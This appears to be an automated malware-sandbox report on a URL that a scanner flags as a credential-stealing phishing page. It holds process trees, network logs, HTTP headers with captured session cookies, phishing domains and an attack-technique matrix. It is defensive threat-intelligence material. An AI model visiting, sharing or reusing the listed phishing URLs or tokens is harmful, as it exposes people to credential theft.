Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://0xl45.ateros1.com/OpLz16A1v5Gc/

Overview

General Information

Sample URL:https://0xl45.ateros1.com/OpLz16A1v5Gc/
Analysis ID:1405009
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
HTML page contains hidden URLs or javascript code

Classification

  • System is w10x64
  • chrome.exe (PID: 2620 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 4176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2204,i,10409208665149905087,14052384433586685165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 3520 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://0xl45.ateros1.com/OpLz16A1v5Gc/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://0xl45.ateros1.com/OpLz16A1v5Gc/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering
Source: https://0xl45.ateros1.com/OpLz16A1v5Gc/HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
Source: unknownHTTPS traffic detected: 20.10.31.115:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.202.57.177:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.202.57.177:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.10.31.115:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.10.31.115:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.7.2.167:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.7.2.167:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 23.202.57.177
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownTCP traffic detected without corresponding DNS query: 20.7.2.167
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /OpLz16A1v5Gc/ HTTP/1.1Host: 0xl45.ateros1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 0xl45.ateros1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0xl45.ateros1.com/OpLz16A1v5Gc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20iLCJtYWMiOiJjMzQ2Zjc5NGYwZGRjOWVkYTE0M2VhMzViYWI0N2E5OGM3NTk0Y2NjZTFhYzIxYzYwNzJiYTE3MDUzMThlNzExIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO HTTP/1.1Host: g461z.scharb9.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://0xl45.ateros1.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://0xl45.ateros1.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zrbeujxxwrlbp2Xcc8pe9gtxfIfDzptgdwgcganq?wgmtgxIEWEOYMIVPTWMRKCPMCVDZIDdmlrspzursjyptrxjszgoapjefpqcijsfinqcltjdepeyvk HTTP/1.1Host: 0xl45.ateros1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://0xl45.ateros1.com/OpLz16A1v5Gc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20iLCJtYWMiOiJjMzQ2Zjc5NGYwZGRjOWVkYTE0M2VhMzViYWI0N2E5OGM3NTk0Y2NjZTFhYzIxYzYwNzJiYTE3MDUzMThlNzExIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO HTTP/1.1Host: g461z.scharb9.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: unknownDNS traffic detected: queries for: 0xl45.ateros1.com
Source: unknownHTTP traffic detected: POST /report/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 437Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Mar 2024 18:13:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: MISSServer: cloudflareCF-RAY: 860c8ef6f9d50ad1-LAS
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Mar 2024 18:13:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 860c8f028f110a03-LAS
Source: chromecache_40.2.drString found in binary or memory: https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZH
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownHTTPS traffic detected: 20.10.31.115:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.202.57.177:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.202.57.177:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.10.31.115:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.10.31.115:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.7.2.167:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.7.2.167:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: classification engineClassification label: mal48.win@17/5@10/7
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2204,i,10409208665149905087,14052384433586685165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://0xl45.ateros1.com/OpLz16A1v5Gc/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2204,i,10409208665149905087,14052384433586685165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://0xl45.ateros1.com/OpLz16A1v5Gc/0%Avira URL Cloudsafe
https://0xl45.ateros1.com/OpLz16A1v5Gc/100%SlashNextCredential Stealing type: Phishing & Social usering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZH0%Avira URL Cloudsafe
https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO0%Avira URL Cloudsafe
https://0xl45.ateros1.com/favicon.ico0%Avira URL Cloudsafe
https://0xl45.ateros1.com/zrbeujxxwrlbp2Xcc8pe9gtxfIfDzptgdwgcganq?wgmtgxIEWEOYMIVPTWMRKCPMCVDZIDdmlrspzursjyptrxjszgoapjefpqcijsfinqcltjdepeyvk0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    0xl45.ateros1.com
    104.21.24.112
    truefalse
      unknown
      g461z.scharb9.com
      104.21.14.17
      truefalse
        unknown
        www.google.com
        142.250.101.104
        truefalse
          high
          fp2e7a.wpc.phicdn.net
          192.229.211.108
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXOfalse
            • Avira URL Cloud: safe
            unknown
            https://a.nel.cloudflare.com/report/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqjfalse
              high
              https://0xl45.ateros1.com/zrbeujxxwrlbp2Xcc8pe9gtxfIfDzptgdwgcganq?wgmtgxIEWEOYMIVPTWMRKCPMCVDZIDdmlrspzursjyptrxjszgoapjefpqcijsfinqcltjdepeyvkfalse
              • Avira URL Cloud: safe
              unknown
              https://a.nel.cloudflare.com/report/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9false
                high
                https://0xl45.ateros1.com/OpLz16A1v5Gc/true
                  unknown
                  https://0xl45.ateros1.com/favicon.icofalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHchromecache_40.2.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  142.250.101.104
                  www.google.comUnited States
                  15169GOOGLEUSfalse
                  239.255.255.250
                  unknownReserved
                  unknownunknownfalse
                  104.21.14.17
                  g461z.scharb9.comUnited States
                  13335CLOUDFLARENETUSfalse
                  104.21.24.112
                  0xl45.ateros1.comUnited States
                  13335CLOUDFLARENETUSfalse
                  35.190.80.1
                  a.nel.cloudflare.comUnited States
                  15169GOOGLEUSfalse
                  IP
                  192.168.2.16
                  192.168.2.6
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1405009
                  Start date and time:2024-03-07 19:12:17 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:browseurl.jbs
                  Sample URL:https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal48.win@17/5@10/7
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.251.2.94, 142.251.2.138, 142.251.2.102, 142.251.2.100, 142.251.2.113, 142.251.2.139, 142.251.2.101, 142.251.2.84, 34.104.35.123, 20.12.23.50, 192.229.211.108, 20.3.187.198, 52.165.164.15, 23.206.188.54, 23.206.188.49, 23.206.188.67, 23.206.188.32, 23.206.188.36, 23.206.188.52, 23.206.188.27, 23.206.188.28, 23.206.188.60, 142.250.101.94, 23.206.188.22
                  • Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  No simulations
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (5929), with CRLF line terminators
                  Category:downloaded
                  Size (bytes):6560
                  Entropy (8bit):5.899784601572728
                  Encrypted:false
                  SSDEEP:96:dNjc4d9QOzzrVgMsrn+SxWA3jklvo8zpQUo6dK20OdvvtP53iaD6fd6RtrInuRIK:dNI4dH5Tc9tz4vogpo6LdvvJDSd+5Jn
